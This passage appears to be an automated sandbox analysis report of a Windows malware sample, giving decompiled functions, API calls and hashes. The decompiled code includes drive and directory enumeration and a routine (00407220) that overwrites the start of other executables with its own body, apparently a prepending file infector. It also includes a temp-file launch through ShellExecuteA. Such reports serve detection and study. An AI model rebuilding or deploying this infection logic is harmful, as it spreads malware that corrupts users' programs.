Instruction Fuzzy Hash: 513188B53005006BD705BF26998295B3799DFC5328B60847FB904EB2C7EA7DDC018E99

Uniqueness

Uniqueness Score: -1.00%

Function 00405080, Relevance: 4.6, APIs: 3, Instructions: 100
fileCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00405080(char __eax, void* __ebx, intOrPtr* __ecx, char __edx, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				struct _WIN32_FIND_DATAA _v336;
				char _v340;
				char _v344;
				signed int _t50;
				signed int _t51;
				int _t53;
				intOrPtr* _t76;
				intOrPtr _t85;
				void* _t96;
				void* _t99;

				_v344 = 0;
				_v340 = 0;
				_v16 = 0;
				_t76 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E004033FC(_v8);
				E004033FC(_v12);
				_push(_t99);
				_push(0x4051db);
				_push( *[fs:eax]);
				 *[fs:eax] = _t99 + 0xfffffeac;
				E00403094(__ecx);
				if(_v8 != 0 &&  *((char*)(_v8 + E0040320C(_v8) - 1)) != 0x5c) {
					E00403214( &_v8, 0x4051f0);
				}
				if(_v12 != 0 &&  *_v12 == 0x5c) {
					E00404728(_v12,  &_v340, 2);
					E0040312C( &_v12, _v340);
				}
				E00403258( &_v16, _v12, _v8);
				_t50 = FindFirstFileA(E0040340C(_v16),  &_v336); // executed
				_t96 = _t50;
				_t51 = _t50 & 0xffffff00 | _t96 != 0x00000000;
				while(_t51 != 0) {
					if((_v336.dwFileAttributes & 0x00000010) <= 0) {
						if( *_t76 != 0) {
							E00403214(_t76, E004051FC);
						}
						_push( *_t76);
						_push(_v8);
						E004031F4( &_v344, 0x104,  &(_v336.cFileName));
						_push(_v344);
						E004032CC();
					}
					_t53 = FindNextFileA(_t96,  &_v336); // executed
					asm("sbb eax, eax");
					_t51 = _t53 + 1;
				}
				FindClose(_t96); // executed
				_pop(_t85);
				 *[fs:eax] = _t85;
				_push(E004051E2);
				E004030B8( &_v344, 2);
				return E004030B8( &_v16, 3);
			}

0x0040508d
0x00405093
0x00405099
0x0040509c
0x0040509e
0x004050a1
0x004050a7
0x004050af
0x004050b6
0x004050b7
0x004050bc
0x004050bf
0x004050c4
0x004050cd
0x004050e9
0x004050e9
0x004050f2
0x0040510a
0x00405118
0x00405118
0x00405126
0x0040513b
0x00405140
0x00405144
0x004051a6
0x00405153
0x00405158
0x00405161
0x00405161
0x00405166
0x00405168
0x0040517c
0x00405181
0x0040518e
0x0040518e
0x0040519b
0x004051a3
0x004051a5
0x004051a5
0x004051ab
0x004051b2
0x004051b5
0x004051b8
0x004051c8
0x004051da

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,004051DB,?,?,?,?,0040523E,00000000,00405291,?,?,00000000,00000000,00000000), ref: 0040513B
FindNextFileA.KERNEL32(00000000,00000010), ref: 0040519B
FindClose.KERNEL32(00000000,00000000,00000010), ref: 004051AB

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 160a495d7ec104938461292bfad31e3b7ac94a958c42663ffc60227caa74a847
Instruction ID: 84585f26add88bff0cc2ce1aee7b2e7e5f9eb71f6f66f1e556af33cdfbb1cecb
Opcode Fuzzy Hash: 160a495d7ec104938461292bfad31e3b7ac94a958c42663ffc60227caa74a847
Instruction Fuzzy Hash: ED415070900508AFDB11EF95C885BDEBBB8EF89305F5044FAE404BB291D7389F459E59

Uniqueness

Uniqueness Score: -1.00%

Function 004056A7, Relevance: 4.6, APIs: 3, Instructions: 74
fileCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E004056A7(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _t14;
				CHAR* _t20;
				void* _t21;
				int _t30;
				void* _t41;
				void* _t45;
				void* _t51;
				void* _t60;
				void* _t62;
				void* _t65;
				void* _t67;
				struct _WIN32_FIND_DATAA* _t68;

				_t64 = __esi;
				_t41 = __ebx;
				_t14 = __eax -  *__eax;
				asm("popad");
				_t68 = _t67 + 0xfffffec0;
				_push(0);
				_push(0);
				E00405300(__ecx, __ebx, _t14, _t68, __edi, __esi);
				_pop(_t45);
				E00403258( &(_t68->ftCreationTime), _t45,  *((intOrPtr*)(__ebx + 0x1c)));
				E004044A8();
				_t20 = _t45;
				_push(_t20);
				_t21 = FindFirstFileA(_t20, _t68); // executed
				_t62 = _t21;
				asm("pushfd");
				E00403094(_t68);
				asm("popfd");
				if(_t21 + 1 != 0) {
					do {
						if(E0040536C(_t41, _t41, _t68->dwFileAttributes,  &(_t68->cFileName[4]), _t62, _t64,  *((intOrPtr*)(_t65 + 8))) != 0) {
							asm("jecxz 0x16");
							 *((intOrPtr*)(_t41 + 0x24))(_t68, 1);
							asm("jecxz 0x22");
							asm("loop 0x31");
							_push(E00402448(0x140));
							E004045E8( *((intOrPtr*)(_t41 + 0x18)), _t35);
							_pop(_t60);
							_t51 = 0x140;
							E0040254C(_t68, _t51, _t60);
						}
						_t30 = FindNextFileA(_t62, _t68); // executed
					} while (_t30 != 0);
					FindClose(_t62);
				}
				 *((intOrPtr*)(_t41 + 0x20)) = 0;
				return E00404520( *((intOrPtr*)(_t41 + 0x20)));
			}

0x004056a7
0x004056a7
0x004056a7
0x004056a9
0x004056aa
0x004056b2
0x004056b3
0x004056b7
0x004056c3
0x004056c5
0x004056ca
0x004056cf
0x004056d2
0x004056d5
0x004056da
0x004056df
0x004056e0
0x004056e5
0x004056e7
0x004056e9
0x004056fc
0x00405701
0x0040570f
0x00405713
0x00405715
0x00405722
0x00405727
0x0040572c
0x0040572d
0x00405730
0x00405730
0x00405737
0x0040573c
0x00405741
0x00405741
0x0040574e
0x00405759

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,00000000,004082B4,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,0040754A,00000000,004075DB), ref: 004056D5
FindNextFileA.KERNEL32(00000000,?,004082B4,?,00000000,00000000,004082B4,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,0040754A), ref: 00405737
FindClose.KERNEL32(00000000,00000000,?,004082B4,?,00000000,00000000,004082B4,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000), ref: 00405741

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 685cc5c0c06893396b6ace7be3eb1d24b5a99c15ff4bfa8703b1440212bdbb2b
Instruction ID: f2b03bfa0ad8d059d80b67f6c6517dce38b4ab09ecbfd790616c6b691a452e24
Opcode Fuzzy Hash: 685cc5c0c06893396b6ace7be3eb1d24b5a99c15ff4bfa8703b1440212bdbb2b
Instruction Fuzzy Hash: 0E1181B53005006BD605BB269D8296B3759DBC5328B10843FBA04EB2C7DA3DCC029A99

Uniqueness

Uniqueness Score: -1.00%

Function 00406D40, Relevance: 4.6, APIs: 3, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00406D40(void* __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				char _v5;
				char _v156;
				signed int _v160;
				char _v164;
				signed int _t51;
				intOrPtr _t56;
				void* _t63;
				signed int _t66;
				signed int _t68;
				void* _t70;
				void* _t71;

				_t70 = _t71;
				_v164 = 0;
				_v160 = 0;
				_v5 = __edx;
				_t63 = __eax;
				_push(_t70);
				_push(0x406e4e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t71 + 0xffffff60;
				GetLogicalDriveStringsA(0x97,  &_v156); // executed
				_t51 = 0;
				while(1) {
					_t66 = _t51 & 0x000000ff;
					if( *(_t70 + _t66 - 0x98) == 0) {
						break;
					}
					if(_v5 == 0) {
						_t68 = _t51 & 0x000000ff;
						if(E0040258C( *(_t70 + _t68 - 0x98)) != 0x41 && E0040258C( *(_t70 + _t68 - 0x98)) != 0x42 && GetDriveTypeA(_t70 + _t68 - 0x98) != 5) {
							E004031B4();
							E00403214(_t63, _v164);
						}
					} else {
						if(GetDriveTypeA(_t70 + _t66 - 0x98) == 5) {
							E004031B4();
							E00403214(_t63, _v160);
						}
					}
					_t51 = _t51 + 4;
				}
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(E00406E55);
				return E004030B8( &_v164, 2);
			}

0x00406d41
0x00406d4e
0x00406d54
0x00406d5a
0x00406d5d
0x00406d61
0x00406d62
0x00406d67
0x00406d6a
0x00406d79
0x00406d7e
0x00406e1a
0x00406e1c
0x00406e2a
0x00000000
0x00000000
0x00406d89
0x00406dc0
0x00406dd4
0x00406e05
0x00406e12
0x00406e12
0x00406d8b
0x00406d9b
0x00406daa
0x00406db7
0x00406db7
0x00406d9b
0x00406e17
0x00406e17
0x00406e32
0x00406e35
0x00406e38
0x00406e4d

APIs

GetLogicalDriveStringsA.KERNEL32 ref: 00406D79
GetDriveTypeA.KERNEL32(00000000), ref: 00406D93

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Drive$LogicalStringsType
String ID:
API String ID: 1630765265-0
Opcode ID: dcc7919cd20a964838369767ccfd13fdc61de2c65117f209f687be36214e1bc6
Instruction ID: b6747592a19c0635c62d8cfc3cbf71e3db2012683142c8441be67559fbbab290
Opcode Fuzzy Hash: dcc7919cd20a964838369767ccfd13fdc61de2c65117f209f687be36214e1bc6
Instruction Fuzzy Hash: 8421F7759043885ADB20AE75CC417E97B699B86304F4640FBE80DB33C2CA788D5ACF59

Uniqueness

Uniqueness Score: -1.00%

Function 00404F6C, Relevance: 3.0, APIs: 2, Instructions: 12
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404F6C(CHAR* __eax) {
				intOrPtr _v288;
				void* _t3;
				void* _t4;
				struct _WIN32_FIND_DATAA* _t8;

				_t3 = FindFirstFileA(__eax, _t8); // executed
				_t4 = _t3 + 1;
				if(_t4 != 0) {
					FindClose(_t4 - 1); // executed
					return _v288;
				}
				return _t4;
			}

0x00404f74
0x00404f79
0x00404f7a
0x00404f7e
0x00000000
0x00404f83
0x00404f8d

APIs

FindFirstFileA.KERNEL32(?,?,0040821F,00000000,004082B4), ref: 00404F74
FindClose.KERNEL32(00000000,?,?,0040821F,00000000,004082B4), ref: 00404F7E

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 02548c725d9e45131fd1c362ffdfc86aac1187def22e8373c54bf7181a1369e7
Instruction ID: 35bd28bbec0286cbaf15e580cccf41787655d5f9f594f83c1a320a5651e29ebc
Opcode Fuzzy Hash: 02548c725d9e45131fd1c362ffdfc86aac1187def22e8373c54bf7181a1369e7
Instruction Fuzzy Hash: B8C08CE480010023C80033AA8C06A27204CBAC0358F88092A7BA8F72C3C93E891040AE

Uniqueness

Uniqueness Score: -1.00%

Function 00407220, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00407220(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v9;
				char _v16;
				char _v40254;
				char _v41487;
				char _v41488;
				char _v41492;
				char _v41496;
				char _v41500;
				char _v41504;
				void* _t45;
				void* _t80;
				void* _t82;
				long _t85;
				CHAR* _t130;
				intOrPtr _t150;
				void* _t154;
				void* _t155;
				long _t173;
				void* _t177;
				void* _t178;

				_t128 = __ebx;
				_t177 = _t178;
				_push(__eax);
				_t45 = 0xa;
				goto L1;
				L17:
				_pop(_t150);
				 *[fs:eax] = _t150;
				_push(E004074E3);
				E004030B8( &_v41504, 4);
				return E00403094( &_v8);
				L1:
				_t178 = _t178 + 0xfffff004;
				_push(_t45);
				_t45 = _t45 - 1;
				_t180 = _t45;
				if(_t45 != 0) {
					goto L1;
				} else {
					_push(__ebx);
					_v41504 = 0;
					_v41500 = 0;
					_v41496 = 0;
					_v41492 = 0;
					E004033FC(_v8);
					_push(_t177);
					_push(0x4074dc);
					_push( *[fs:eax]);
					 *[fs:eax] = _t178 + 0xfffffde8;
					_v9 = 0;
					E004031F4( &_v41492, 3, 0x4091c0);
					if(E00407034(_v8, __ebx, _v41492, _t180) != 0) {
						E00404F34(_v8,  &_v41496);
						E0040312C( &_v8, _v41496);
						E00404F90( &_v41500, _t128, 3);
						_push(E0040340C(_v41500));
						_t129 = E0040340C(_v8);
						_pop(_t154);
						if(E00404B38(_t68, _t154) == 0) {
							E00405008( &_v41504, _t129, 3);
							_t155 = E0040340C(_v41504);
							if(E00404B38(_t129, _t155) == 0 && E004034EC("\\PROGRA~1\\", _v8) != 3) {
								_t80 = E00404F6C(_v8);
								if(_t80 > 0xa200 && _t80 <= 0x989680) {
									_t82 = E00407180(_v8, _t129); // executed
									if(_t82 == 0) {
										_v9 = 1;
										_t130 = E0040340C(_v8);
										_t85 = GetFileAttributesA(_t130); // executed
										_t173 = _t85;
										if((_t173 & 0x00000001) > 0) {
											SetFileAttributesA(_t130, 0);
										}
										_t131 = E00405BDC();
										_t175 = E004064CC();
										E00406CA8(_t87, 0, _v8);
										E00406510(_t175, _t86);
										E00405974();
										E00404198();
										E00405988(_t131);
										E00404520(_t131);
										E00404520(_t175);
										_t132 = E00404B68(_v8, 0xc0000303);
										if(_t103 != 0xffffffff) {
											E00404BC4(_t132, 2,  &_v41488);
											if(_v41488 == 0x4d && _v41487 == 0x5a) {
												E00404BB4(_t132, 0, 0);
												E00404BC4(_t132, 0xa200,  &_v41488);
												E0040254C( &_v40254, 4,  &_v16);
												E004070D0( &_v41488, _v16, 0x3e8);
												E00404BB4(_t132, 0, 0);
												E00404BE0(_t132, 0xa200, 0x40a698);
												E00404BB4(_t132, 2, 0);
												E00404BE0(_t132, 0xa200,  &_v41488);
											}
										}
										E00404B90(_t132);
										if((_t173 & 0x00000001) > 0) {
											SetFileAttributesA(E0040340C(_v8), _t173);
										}
									}
								}
							}
						}
					}
					goto L17;
				}
			}

0x00407220
0x00407221
0x00407223
0x00407224
0x00407224
0x004074b6
0x004074b8
0x004074bb
0x004074be
0x004074ce
0x004074db
0x00407229
0x00407229
0x0040722f
0x00407230
0x00407230
0x00407231
0x00000000
0x00407233
0x0040723c
0x00407241
0x00407247
0x0040724d
0x00407253
0x0040725f
0x00407266
0x00407267
0x0040726c
0x0040726f
0x00407272
0x00407286
0x0040729b
0x004072aa
0x004072b8
0x004072c3
0x004072d3
0x004072dc
0x004072e0
0x004072e8
0x004072f4
0x00407307
0x0040730f
0x0040732e
0x00407338
0x0040734c
0x00407353
0x00407359
0x00407365
0x00407368
0x0040736d
0x00407375
0x0040737a
0x0040737a
0x00407384
0x0040738b
0x00407394
0x0040739d
0x004073a9
0x004073b8
0x004073c9
0x004073d0
0x004073d7
0x004073e9
0x004073ee
0x00407401
0x0040740d
0x00407422
0x00407434
0x00407447
0x0040745a
0x00407465
0x00407476
0x00407481
0x00407493
0x00407493
0x0040740d
0x0040749a
0x004074a5
0x004074b1
0x004074b1
0x004074a5
0x00407353
0x00407338
0x0040730f
0x004072e8
0x00000000
0x0040729b

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00407368
SetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 0040737A

Part of subcall function 00404B68: CreateFileA.KERNEL32(004082B4,80000301,80000301,00000000,80000301,80000301,00000000), ref: 00404B88

SetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 004074B1

Part of subcall function 00404BC4: ReadFile.KERNEL32(00000000,0040A698,?,?,00000000), ref: 00404BCF

Part of subcall function 00404BB4: SetFilePointer.KERNEL32(00000000,000003E8,00000000,?,004071C9,00000000,0040720F,?,00000000), ref: 00404BBC

Part of subcall function 00404BE0: WriteFile.KERNEL32(00000000,0040A698,0000A200,?,00000000), ref: 00404BEA

Strings

Z, xrefs: 00407413
M, xrefs: 00407406
\PROGRA~1\, xrefs: 00407318

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$Attributes$CreatePointerReadWrite
String ID: M$Z$\PROGRA~1\
API String ID: 997383822-1237680573
Opcode ID: 1f7a6ed3ee3897742bc6a12b4c4452d1e19d4b98f5237bca1a3ea14166616f92
Instruction ID: d8cc05f0b2aaa72dcc8a3c5f482cc74a30301c94eead2632609f6c9661d1721d
Opcode Fuzzy Hash: 1f7a6ed3ee3897742bc6a12b4c4452d1e19d4b98f5237bca1a3ea14166616f92
Instruction Fuzzy Hash: 69514370B042045BDB10FB6ACC82A9E77A59F85308F1085BBB504B73D3DA7DEF454A5A

Uniqueness

Uniqueness Score: -1.00%

Function 00401788, Relevance: 6.0, APIs: 4, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00401788() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E0040183E);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x40a5b4);
				L004010DC();
				if( *0x40a035 != 0) {
					_push(0x40a5b4);
					L004010E4();
				}
				E0040114C(0x40a5d4);
				E0040114C(0x40a5e4);
				E0040114C(0x40a610);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x40a60c = _t11;
				if( *0x40a60c != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x40a60c; // 0x0
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x40a5f8)) = 0x40a5f4;
					 *0x40a5f4 = 0x40a5f4;
					 *0x40a600 = 0x40a5f4;
					 *0x40a5ac = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00401845);
				if( *0x40a035 != 0) {
					_push(0x40a5b4);
					L004010EC();
					return 0;
				}
				return 0;
			}

0x0040178d
0x0040178e
0x00401793
0x00401796
0x00401799
0x0040179e
0x004017aa
0x004017ac
0x004017b1
0x004017b1
0x004017bb
0x004017c5
0x004017cf
0x004017db
0x004017e0
0x004017ec
0x004017ee
0x004017f3
0x004017f3
0x004017fb
0x004017ff
0x00401800
0x0040180c
0x0040180f
0x00401811
0x00401816
0x00401816
0x0040181f
0x00401822
0x00401825
0x00401831
0x00401833
0x00401838
0x00000000
0x00401838
0x0040183d

APIs

RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 0040179E
RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017B1
LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017DB
RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 00401838

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: c9b9ab944485395422a6771bfcf5214d8e6e603dede59e4d299fed86385dc31f
Instruction ID: b00ea9f5082304a52c30b3310984ccb38099dd734a88c9f27aa2559637ee1f83
Opcode Fuzzy Hash: c9b9ab944485395422a6771bfcf5214d8e6e603dede59e4d299fed86385dc31f
Instruction Fuzzy Hash: 400184B0604380AEE715AF6A9D06B167BA4E749704F04C53FA140B66F2CA7D44A0CB5F

Uniqueness

Uniqueness Score: -1.00%

Function 004078F6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E004078F6(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				char* _t39;
				void* _t40;
				void* _t46;
				intOrPtr _t57;
				void* _t61;

				_t60 = __esi;
				_t59 = __edi;
				_t46 = __ecx;
				_t45 = __ebx;
				E004049D0(0, __ebx, _t61 - 0xa244, __edi, __esi);
				E00404EEC(_t61 - 0xa240);
				SetCurrentDirectoryA(E0040340C( *((intOrPtr*)(_t61 - 0xa240)))); // executed
				_push(1);
				_push(0);
				E00406F84(1, __ebx, _t61 - 0xa248, __edi, __esi);
				_push(E0040340C( *((intOrPtr*)(_t61 - 0xa248))));
				E00405008(_t61 - 0xa250, _t45, _t46);
				E004031F4(_t61 - 0xa254, 9,  &E004091B4);
				E004049D0(0, _t45, _t61 - 0xa25c, _t59, _t60);
				E00404ED0( *((intOrPtr*)(_t61 - 0xa25c)), _t61 - 0xa258);
				E004032CC();
				_t39 = E0040340C( *((intOrPtr*)(_t61 - 0xa24c)));
				_t40 =  *0x40a650; // 0x400000
				ShellExecuteA(_t40, "open", _t39,  *(_t61 - 0xa258),  *(_t61 - 0xa254),  *(_t61 - 0xa250)); // executed
				_pop(_t57);
				 *[fs:eax] = _t57;
				_push(E004079E3);
				return E004030B8(_t61 - 0xa25c, 0x14);
			}

0x004078f6
0x004078f6
0x004078f6
0x004078f6
0x004078fe
0x0040790f
0x00407920
0x00407925
0x00407927
0x00407931
0x00407941
0x00407948
0x00407963
0x00407976
0x00407987
0x0040799d
0x004079a8
0x004079b3
0x004079b9
0x004079c0
0x004079c3
0x004079c6
0x004079db

APIs

Part of subcall function 004049D0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000000,00404ADA,?,?,?,?,?,00407149,00000000,00407176,?,00000000), ref: 00404A09

SetCurrentDirectoryA.KERNEL32(00000000), ref: 00407920

Part of subcall function 00405008: GetTempPathA.KERNEL32(00000105,?), ref: 00405036

Part of subcall function 004049D0: GetCommandLineA.KERNEL32(00000000,00404ADA,?,?,?,?,?,00407149,00000000,00407176,?,00000000,?,0040820D,00000000,004082B4), ref: 00404A23

ShellExecuteA.SHELL32(00400000,open,00000000,?,?,?), ref: 004079B9

Strings

open, xrefs: 004079AE

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CommandCurrentDirectoryExecuteFileLineModuleNamePathShellTemp
String ID: open
API String ID: 2622400689-2758837156
Opcode ID: 4ee5c1c4e0e267021bb35180bc67cb1abd9a0b0d6b917f11fb5a100ff910c53c
Instruction ID: 22f11b2814642ef3825e08ba06ff2dcc766d1ae0821f9cf915b99e46158976e0
Opcode Fuzzy Hash: 4ee5c1c4e0e267021bb35180bc67cb1abd9a0b0d6b917f11fb5a100ff910c53c
Instruction Fuzzy Hash: BD110370B107195ADB10FB79CC4198EB779FF85308F0045F6B1087B192D67E9E858E5A

Uniqueness

Uniqueness Score: -1.00%

Function 00401E74, Relevance: 3.1, APIs: 2, Instructions: 124COMMON

Download Yara Rule

APIs

Part of subcall function 00401788: RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 0040179E
Part of subcall function 00401788: RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017B1
Part of subcall function 00401788: LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017DB
Part of subcall function 00401788: RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 00401838

RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,00401FF0), ref: 00401EBF
RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401FF7), ref: 00401FEA

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$AllocInitializeLocal
String ID:
API String ID: 2227675388-0
Opcode ID: 6cce4fe2ae363967d94b79daeb9e60da6e25168e4661eab307a1afa9d8e64cf7
Instruction ID: c8d1828e50afdd1ef66478082c2fc5af823077db28515af4f228c2db3bc24797
Opcode Fuzzy Hash: 6cce4fe2ae363967d94b79daeb9e60da6e25168e4661eab307a1afa9d8e64cf7
Instruction Fuzzy Hash: 8A419BB2A043029FD714CF69DE81A2AB7B0FB59318B18827FD441E72F1D739A8518A49

Uniqueness

Uniqueness Score: -1.00%

Function 00402FA4, Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00402FA4() {
				struct HINSTANCE__* _t24;
				void* _t32;
				intOrPtr _t35;
				void* _t45;

				if( *0x0040A648 != 0 ||  *0x40a030 == 0) {
					L3:
					if( *0x409004 != 0) {
						E00402E8C();
						E00402F18(_t32);
						 *0x409004 = 0;
					}
					L5:
					while(1) {
						if( *((char*)(0x40a648)) == 2 &&  *0x409000 == 0) {
							 *0x0040A62C = 0;
						}
						E00402D8C();
						if( *((char*)(0x40a648)) <= 1 ||  *0x409000 != 0) {
							_t14 =  *0x0040A630;
							if( *0x0040A630 != 0) {
								E00403C00(_t14);
								_t35 =  *((intOrPtr*)(0x40a630));
								_t7 = _t35 + 0x10; // 0x0
								_t24 =  *_t7;
								_t8 = _t35 + 4; // 0x400000
								if(_t24 !=  *_t8 && _t24 != 0) {
									FreeLibrary(_t24);
								}
							}
						}
						E00402D64();
						if( *((char*)(0x40a648)) == 1) {
							 *0x0040A644();
						}
						if( *((char*)(0x40a648)) != 0) {
							E00402EE8();
						}
						if( *0x40a620 == 0) {
							if( *0x40a018 != 0) {
								 *0x40a018();
							}
							ExitProcess( *0x409000); // executed
						}
						memcpy(0x40a620,  *0x40a620, 0xb << 2);
						_t45 = _t45 + 0xc;
						0x409000 = 0x409000;
					}
				} else {
					do {
						 *0x40a030 = 0;
						 *((intOrPtr*)( *0x40a030))();
					} while ( *0x40a030 != 0);
					goto L3;
				}
			}

0x00402fbb
0x00402fd3
0x00402fda
0x00402fdc
0x00402fe1
0x00402fe8
0x00402fe8
0x00000000
0x00402fed
0x00402ff1
0x00402ffa
0x00402ffa
0x00402ffd
0x00403006
0x0040300d
0x00403012
0x00403014
0x00403019
0x0040301c
0x0040301c
0x0040301f
0x00403022
0x00403029
0x00403029
0x00403022
0x00403012
0x0040302e
0x00403037
0x00403039
0x00403039
0x00403040
0x00403042
0x00403042
0x0040304a
0x00403053
0x00403055
0x00403055
0x0040305e
0x0040305e
0x0040306f
0x0040306f
0x00403071
0x00403071
0x00402fc2
0x00402fc2
0x00402fc8
0x00402fcc
0x00402fce
0x00000000
0x00402fc2

APIs

FreeLibrary.KERNEL32(00400000,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000,00000000,00402460), ref: 00403029
ExitProcess.KERNEL32(00000000,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000,00000000,00402460), ref: 0040305E

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitFreeLibraryProcess
String ID:
API String ID: 1404682716-0
Opcode ID: ab20704e86a3c794a86d4a60a2f3f790aa59cc74fa6ee8820611fb12759a24f3
Instruction ID: 25a4abd2e023ddac5d936c147021e49c52e2d721a9332ed2c08f3b56dfe932ed
Opcode Fuzzy Hash: ab20704e86a3c794a86d4a60a2f3f790aa59cc74fa6ee8820611fb12759a24f3
Instruction Fuzzy Hash: 77218E709012018BEB20AF65C6887537AE9AF44355F24447BD844A72D6D7BCCDC0DBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00402F9C, Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00402F9C() {
				intOrPtr* _t13;
				struct HINSTANCE__* _t27;
				void* _t36;
				intOrPtr _t39;
				void* _t52;

				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
				if( *0x0040A648 != 0 ||  *0x40a030 == 0) {
					L5:
					if( *0x409004 != 0) {
						E00402E8C();
						E00402F18(_t36);
						 *0x409004 = 0;
					}
					L7:
					if( *((char*)(0x40a648)) == 2 &&  *0x409000 == 0) {
						 *0x0040A62C = 0;
					}
					E00402D8C();
					if( *((char*)(0x40a648)) <= 1 ||  *0x409000 != 0) {
						_t17 =  *0x0040A630;
						if( *0x0040A630 != 0) {
							E00403C00(_t17);
							_t39 =  *((intOrPtr*)(0x40a630));
							_t7 = _t39 + 0x10; // 0x0
							_t27 =  *_t7;
							_t8 = _t39 + 4; // 0x400000
							if(_t27 !=  *_t8 && _t27 != 0) {
								FreeLibrary(_t27);
							}
						}
					}
					E00402D64();
					if( *((char*)(0x40a648)) == 1) {
						 *0x0040A644();
					}
					if( *((char*)(0x40a648)) != 0) {
						E00402EE8();
					}
					if( *0x40a620 == 0) {
						if( *0x40a018 != 0) {
							 *0x40a018();
						}
						ExitProcess( *0x409000); // executed
					}
					memcpy(0x40a620,  *0x40a620, 0xb << 2);
					_t52 = _t52 + 0xc;
					0x409000 = 0x409000;
					goto L7;
				} else {
					do {
						 *0x40a030 = 0;
						 *((intOrPtr*)( *0x40a030))();
